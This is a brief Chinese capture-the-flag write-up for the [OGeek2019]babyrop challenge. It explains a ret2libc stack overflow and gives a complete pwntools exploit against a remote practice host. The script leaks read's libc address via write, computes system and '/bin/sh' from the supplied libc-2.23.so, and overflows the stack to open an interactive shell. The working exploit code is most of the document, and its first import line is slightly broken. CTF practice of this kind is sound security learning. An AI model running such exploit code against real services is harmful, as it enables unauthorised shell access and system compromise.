pwn | [OGeek2019]babyrop

[OGeek2019]babyrop

依旧是栈溢出ret2libc的题目。

这个题给了libc但是一开始我没用，直接写了LibcSearch的脚本，结果打出来不对。
可能是LibcSearch有点拉了，还好有lemon师傅给我提供了一些指导[可以用patchelf去改程序依赖的libc库然后调试]。
一开始弄栈结构的时候又有点糊涂了，简单写一下

xxxxxxxx  # 垃圾数据
xxxxxxxx
xxxxxxxx
p_system    # 返回地址
p_system的返回地址
p_system的参数1
参数2
......

exp:

pwn import *
from LibcSearcher.LibcSearcher import *
import struct
context.log_level = 'debug'

# sh = process('./pwn')
sh = remote('node4.buuoj.cn', 27276)
elf = ELF('./pwn')
_libc = ELF('./libc-2.23.so')
_p_libc_system = _libc.symbols['system']
_p_libc_binsh = _libc.search(b'/bin/sh').__next__()
_p_libc_read = _libc.symbols['read']

write_plt = elf.plt['write']
read_got = elf.got['read']
read_plt = elf.plt['read']

p_main = 0x8048825
p_ret = 0x08048502

sh.sendline(b'\x00aaaaaa\xffa')    
sh.recv()            # Correct\n

# leak libc
payload = b'a'*0xe7+b'b'*4
payload += p32(write_plt)+p32(p_main) +   p32(1)+p32(read_got)+p32(4)  # write argv1 argv2 argv3

sh.sendline(payload)

p_libc_read = u32(sh.recv(4))
print('p_libc_read:'+str(hex(p_libc_read)))

# find libc
# libc = LibcSearcher('read', p_libc_read)
# libc_base = p_libc_read - libc.dump('read')
# p_system = libc_base + libc.dump('system')
# p_binsh = libc_base + libc.dump('str_bin_sh')

libc_base = p_libc_read - _p_libc_read
p_system = libc_base  + _p_libc_system
p_binsh = libc_base  + _p_libc_binsh


sh.send(b'\x00aaaaaa\xffa')
# getshell
sh.recvuntil('Correct\n')

print('\n\n')
payload = b'a'*0xe7 + b'b'*4 + p32(p_system) + p32(p_main)+ p32(p_binsh)

sh.sendline(payload)

sh.interactive()

sh.close()